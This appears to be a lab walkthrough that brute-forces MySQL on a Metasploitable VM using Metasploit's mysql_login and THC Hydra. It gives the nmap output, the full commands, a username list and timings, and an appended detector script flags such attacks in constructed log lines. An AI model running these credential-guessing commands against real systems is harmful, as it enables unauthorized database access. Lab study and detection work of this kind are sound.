PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13?
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
First I wanted to execute some brute-force attacks against the MySQL database that is running in Metasploitable. There are different ways of brute-forcing it, but your scanner is only as good as your wordlist or word-combination files for usernames and passwords (here are username and password lists for a first shot).
As password list I'm using elitehacker.txt.bz2 provided by skullsecurity.org, and I defined six different users:
root@bt:~/test_environment/brute_force# cat username.txt
admin
root
mysql
db
test
user
I also inserted all six of these usernames and a blank line into the elitehackers.txt password file.
1. Using Metasploit
#msfconsole
#search mysql
#use auxiliary/scanner/mysql/mysql_login
#show options
#set RHOSTS <Target IP>
#set USER_FILE /root/<your_username_file>
#set PASS_FILE /root/<your_password_file>
#exploit
Verbose mode is set to true by default, so you see every single login attempt. This is not very convenient, for two reasons:
a) If the brute-force attempt is successful you have to scroll back through the whole list of attempts to find the valid login, because the mysql_login module prints no summary when it finishes (this can be very nasty).
b) The actual scan performance drops dramatically. When I scanned with verbose set to true it took 5 minutes and 5 seconds; after deactivating verbose mode, the scan was done in 2 minutes and 5 seconds.
Conclusion => #set VERBOSE false
2. Using THC Hydra
#hydra -L /root/<your_username_file> -P /root/<your_password_file> <IP> mysql
3. Result
So here is an overview of the results (all scans were executed with the same username and password files).
Tool / configuration | Scan time
mysql_login (verbose mode activated) | 5 minutes 5 seconds
mysql_login (verbose mode deactivated) | 2 minutes 5 seconds
THC Hydra | 4 minutes 8 seconds
It was just a very small brute-forcing attack (5,412 username/password combinations), but Metasploit took almost 25% more time than Hydra with the same wordlists when verbose mode is activated in mysql_login.
With verbose mode deactivated, however, it is by far the most effective way to brute-force MySQL.
I don't know whether this scales the same way when the brute-force attack has more combinations, but the mysql_login module of Metasploit seems more efficient for MySQL brute-forcing than THC Hydra.
So let's check this finding manually:
So now we have another login, for a new attack :-)
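Seen from the database owner's side, the timings above translate into roughly 18 to 43 login attempts per second from a single source, which is easy to spot in the server's authentication failures. The following Python script is an added example (not part of the original post) that derives those rates from the post's figures and runs a per-source sliding-window detector over constructed "Access denied" log lines in the MySQL 5.7+ error-log format; the log format, the 10-second window and the threshold of 20 failures are assumptions for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Figures from the post: 5,412 username/password combinations per run.
COMBINATIONS = 5412
RUN_SECONDS = {"mysql_login verbose": 305, "mysql_login quiet": 125, "hydra": 248}

def attempts_per_second(combinations=COMBINATIONS, runs=RUN_SECONDS):
    """Login attempts per second each tool reached, rounded to one decimal."""
    return {name: round(combinations / secs, 1) for name, secs in runs.items()}

# Assumed log line shape (MySQL 5.7+ error log "Access denied" warning).
LINE_RE = re.compile(
    r"^(?P<ts>\S+) \d+ \[Warning\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']+)'"
)

def failed_logins(lines):
    """Yield (timestamp, user, source host) for every failed-login line."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"].rstrip("Z")), m["user"], m["host"]

def detect_bruteforce(lines, threshold=20, window_s=10):
    """Return {host: first alert time} for hosts exceeding `threshold`
    failures inside any `window_s`-second window (lines must be in time order)."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, _user, host in failed_logins(lines):
        q = recent[host]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()  # drop failures that fell out of the window
        if len(q) > threshold and host not in alerts:
            alerts[host] = ts
    return alerts

def sample_log():
    """Constructed sample: one host cycling the post's six usernames at
    20 attempts/s, plus a single unrelated failure from another host."""
    users = ["admin", "root", "mysql", "db", "test", "user"]
    base = datetime(2024, 1, 1, 12, 0, 0)
    lines = []
    for i in range(30):
        ts = (base + timedelta(milliseconds=50 * i)).isoformat(timespec="microseconds")
        lines.append(f"{ts}Z {i + 5} [Warning] Access denied for user "
                     f"'{users[i % 6]}'@'10.0.0.5' (using password: YES)")
    lines.append("2024-01-01T12:05:00.000000Z 99 [Warning] Access denied for user "
                 "'alice'@'10.0.0.7' (using password: YES)")
    return lines
```

Against the constructed sample the scanning host is flagged on its 21st failure, one second into the run, while the lone typo from the other host never trips the threshold.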